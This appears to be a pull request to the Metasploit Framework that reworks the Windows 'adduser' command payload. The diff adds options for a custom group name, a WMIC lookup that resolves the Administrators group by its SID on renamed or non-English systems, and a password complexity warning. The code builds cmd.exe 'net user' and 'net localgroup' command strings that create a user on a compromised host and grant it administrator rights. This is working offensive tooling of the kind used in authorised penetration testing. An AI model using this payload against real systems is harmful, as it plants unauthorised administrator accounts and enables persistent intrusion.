### PR TITLE
Custom group names and WMIC to automatically detect group name based on SID

### DIFF
--- a/modules/payloads/singles/cmd/windows/adduser.rb
+++ b/modules/payloads/singles/cmd/windows/adduser.rb
@@ -13,48 +13,77 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-	include Msf::Payload::Single
-	include Msf::Sessions::CommandShellOptions
+    include Msf::Payload::Single
+    include Msf::Sessions::CommandShellOptions
 
-	def initialize(info = {})
-		super(merge_info(info,
-			'Name'        => 'Windows Execute net user /ADD CMD',
-			'Version'     => '$Revision$',
-			'Description' => 'Create a new user and add them to local administration group',
-			'Author'      => ['hdm','scriptjunkie'],
-			'License'     => MSF_LICENSE,
-			'Platform'    => 'win',
-			'Arch'        => ARCH_CMD,
-			'Handler'     => Msf::Handler::None,
-			'Session'     => Msf::Sessions::CommandShell,
-			'PayloadType' => 'cmd',
-			'Payload'     =>
-				{
-					'Offsets' => { },
-					'Payload' => ''
-				}
-			))
+    def initialize(info = {})
+        super(merge_info(info,
+            'Name'        => 'Windows Execute net user /ADD CMD',
+            'Version'     => '$Revision$',
+            'Description' => 'Create a new user and add them to local administration group',
+            'Author'      => ['hdm','scriptjunkie','Chris John Riley'],
+            'License'     => MSF_LICENSE,
+            'Platform'    => 'win',
+            'Arch'        => ARCH_CMD,
+            'Handler'     => Msf::Handler::None,
+            'Session'     => Msf::Sessions::CommandShell,
+            'PayloadType' => 'cmd',
+            'Payload'     =>
+                {
+                    'Offsets' => { },
+                    'Payload' => ''
+                }
+            ))
 
-		register_options(
-			[
-				OptString.new('USER', [ true, "The username to create",     "metasploit" ]),
-				OptString.new('PASS', [ true, "The password for this user", "metasploit" ]),
-			], self.class)
-	end
+        register_options(
+            [
+                OptString.new('USER',   [ true, "The username to create",     "metasploit" ]),
+                OptString.new('PASS',   [ true, "The password for this user", "metasploit" ]),
+                OptString.new('CUSTOM', [ false, "Custom group name to be used instead of default", '' ]),
+                OptBool.new('WMIC',     [ true, "Use WMIC on the target system to resolve administrators groupname", false ]),
+            ], self.class)
 
-	def generate
-		return super + command_string
-	end
+        register_advanced_options(
+            [
+                OptBool.new("COMPLEXITY", [ true, "Check password for complexity rules", true ]),
+            ], self.class)
 
-	def command_string
-		user = datastore['USER'] || 'metasploit'
-		pass = datastore['PASS'] || ''
+    end
 
-		if(pass.length > 14)
-			raise ArgumentError, "Password for the adduser payload must be 14 characters or less"
-		end
+    def generate
+        return super + command_string
+    end
 
-		return "cmd.exe /c net user #{user} #{pass} /ADD && " +
-			"net localgroup Administrators #{user} /ADD"
-	end
+    def command_string
+        user = datastore['USER'] || 'metasploit'
+        pass = datastore['PASS'] || ''
+        cust = datastore['CUSTOM'] || ''
+        wmic = datastore['WMIC']
+        complexity= datastore['COMPLEXITY']
+
+        if(pass.length > 14)
+            raise ArgumentError, "Password for the adduser payload must be 14 characters or less"
+        end
+
+        if (pass =~ /\A^.*((?=.{8,})(?=.*[a-z])(?=.*[A-Z])(?=.*[\d\W])).*$/) and complexity
+            print_good "Password: #{pass} passes complexity checks"
+        elsif complexity
+            print_error "Password: #{pass} doesn't meet complexity requirements and may cause issues"
+        end
+
+        if not cust.empty?
+            print_status("Using custom group name #{cust}")
+            return "cmd.exe /c net user #{user} #{pass} /ADD && " +
+                "net localgroup \"#{cust}\" #{user} /ADD"
+        elsif wmic
+            print_status("Using WMIC to discover the administrative group name")
+            return "cmd.exe /c \"FOR /F \"usebackq tokens=2* skip=1 delims==\" %G IN (`wmic group where sid^='S-1-5-32-544' get name /Value`); do " +
+                "FOR /F \"usebackq tokens=1 delims==\" %X IN (`echo %G`); do " +
+                "net user #{user} #{pass} /ADD && " +
+                "net localgroup \"%X\" #{user} /ADD\""
+        else
+            return "cmd.exe /c net user #{user} #{pass} /ADD && " +
+                "net localgroup Administrators #{user} /ADD"
+        end
+    end
 end


### PR DESCRIPTION
Adduser payloads :

CUSTOM group name
WMIC method of resolving the Administrators group SID (in cases where the group has been renamed or the system language isn't English).
COMPLEXITY checks against the provided password (warns if the PASS value doesn't meet complexity rules)

Broken out from PULL 247 (now closed) to avoid confusion
